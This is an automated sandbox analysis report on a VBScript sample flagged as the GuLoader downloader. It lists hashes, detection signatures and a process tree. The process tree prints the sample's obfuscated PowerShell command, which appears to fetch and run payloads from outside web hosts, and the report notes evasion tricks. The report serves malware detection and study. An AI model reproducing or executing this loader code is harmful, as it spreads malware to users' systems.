Edit tour
Windows
Analysis Report
v4BET4inNV.vbs
Overview
General Information
| Sample name: | v4BET4inNV.vbsrenamed because original name is a hash value |
| Original sample name: | 3cf4bcb55cd5a352b25c180acce977e652863d8ed09d07335aed81dbc56520f2.vbs |
| Analysis ID: | 1578210 |
| MD5: | 8b310411b49580ae8d67a2ed916bad17 |
| SHA1: | 5eb38f0da8298d117c1c435246959c90abe23da6 |
| SHA256: | 3cf4bcb55cd5a352b25c180acce977e652863d8ed09d07335aed81dbc56520f2 |
| Tags: | 185-236-228-9287-120-112-91www-al-rasikh-comuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2684 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\v4BET 4inNV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
WMIC.exe (PID: 3636 cmdline: wmic diskd rive get c aption,ser ialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785) 
conhost.exe (PID: 1480 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 1200 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" ";$Columbu sgs='Reall nningernes ';;$Cares= 'Doegling' ;;$Novela= 'Dyrkere55 ';;$Pigesj ovetridioc yte='Teist er';;$peac efuller=$h ost.Name;f unction Mu ltiplum($P ousserer){ If ($peace fuller) {$ Exitskilte s=2} for ( $Pigesjove t=$Exitski ltes;;$Pig esjovet+=3 ){if(!$Pou sserer[$Pi gesjovet]) {cls;break }$Vandsta nde+=$Pous serer[$Pig esjovet];$ Fiskeinter essernes=' Unmoralise s'}$Vandst ande}funct ion Unchan neled($Pig esjovetmmu notoxin){ .($instrum entalis) ( $Pigesjove tmmunotoxi n)}$Kvabse rne=Multip lum 'SpnOr eActdu.D.W ';$Kvabser ne+=Multip lum 'AvE b PscMalDeIC ESlnCeT'; $Bugfish=M ultiplum ' fM.joD.zB eiLalAslF a i/';$Exo sperm=Mult iplum 'OpT StlSksRa1 .2';$Bagpr ojektion12 1='go[.an, oESltAd.Os sK e,ar,aV AiGrC,fe OP poslIMa nTeT.rm rA DdNP,a UgD aE,lrv.].j :,u: ,sS E MuCCeuRyrR .iRetK.YBa p NRU o Tt UoHect OA nL H= .$ S eRoX lO ss Mip nEVaRV am';$Bugfi sh+=Multip lum 'Ar5R .Kn0.o (g jWFoiP nM. d roBewdrs , VoNStTs Rv1Un0Re. Dr0V,;T Ut WstiAnn,e6 P,4Br; S S ux 6 N4En; T .urD vSt : E1Pr3Co1 r .D.0s )F l BaG eeR c GkPaoEn/ Ja2 s0 U1f u0 C0L,1 l 0Ha1Wa oF .iMirMleFu fu osuxFo/ M1M 3.k1n y.sn0';$Wh itefishery =Multiplum ',iuCiS y eHurVe- oA UngGhEIbN Rt';$Knyst en=Multipl um 'Vah it ,t,tp.is S:Fr/Ec/,r wMewSew,i. .epGuuBenS peF.eretSl .,gaS e E/ Hei.nt S/A nKKoo Gn u tJvrPeaScs nt nrPai .g tsh.L m Ses o n>N. hU t t ApC osCo: S/On / rwL,wBlw U.Prf VtB esH e n hg Gei inCaeF ieJ rFrs t . .cV o Lm P /gei ItC l/MiKCaoOr n otEmrAna A sTotP r, miByg,itVe .HamB s Eo ';$Tikrone sedler=Mul tiplum 'Sm >';$instru mentalis=M ultiplum ' SpISpe vX' ;$Ribboned 46='Treate r';$fabrik svarerne=' \Pharmacis ts201.Str' ;Unchannel ed (Multip lum 'un$Ch g yL uO .B Gea VLTi:S isVsAB L a TDvI CNBte Rs T=,n$ E HN.aVA.: GrAOvp ,PS rd CaS,TR aHn+ t$Unf PrASeBUdRM aI KByS EV ReAInrA e krRaN oE') ;Unchannel ed (Multip lum 'Af$Sp GCaL aoI B ElA rLRo:, as JInUs S .jKseeGim rI.lK,pkVo eLilPa= D$ D.KSanS.YH aSTit EMen st. s .Pbo LdiIVit,a( As$U T riE nks,r Uo.a NFeeExsBre ADKolO.E. rRSy)');Un channeled (Multiplum $Bagproje ktion121); $Knysten=$ Sjuskemikk el[0];$Thy reoid=(Mul tiplum ' l $P gN,lSlO F,BHaAPelO v:PeI.oN v aAPoLToIR ed FET,f O DaRAasN I akM.R GILe nD G U=EnN oE IW -Re o .bKnJNuE dCPuT,c A S rYLaSI, tBreDrm a. H.$ Ak vno ABoB es e PR hnKaE') ;Unchannel ed ($Thyre oid);Uncha nneled (Mu ltiplum 'P r$ PISan v aa l ,i a d eCofthoB irBisT,iRe k or i fnP egUn.M Hpr eCoa dAfe DrSlss [by $ WLah Fi BtF eHef D iAds ohCoe Arr yIo]Ce =W $ToBTiu P.g yf ,iF sUnh');$R eedmaker=M ultiplum ' r$RaIUsn RvSea,al a i,mdFleAff T oFirK sG liKok PrV, iAvnFrg a. SeDJaoCew AnR,lT.ogr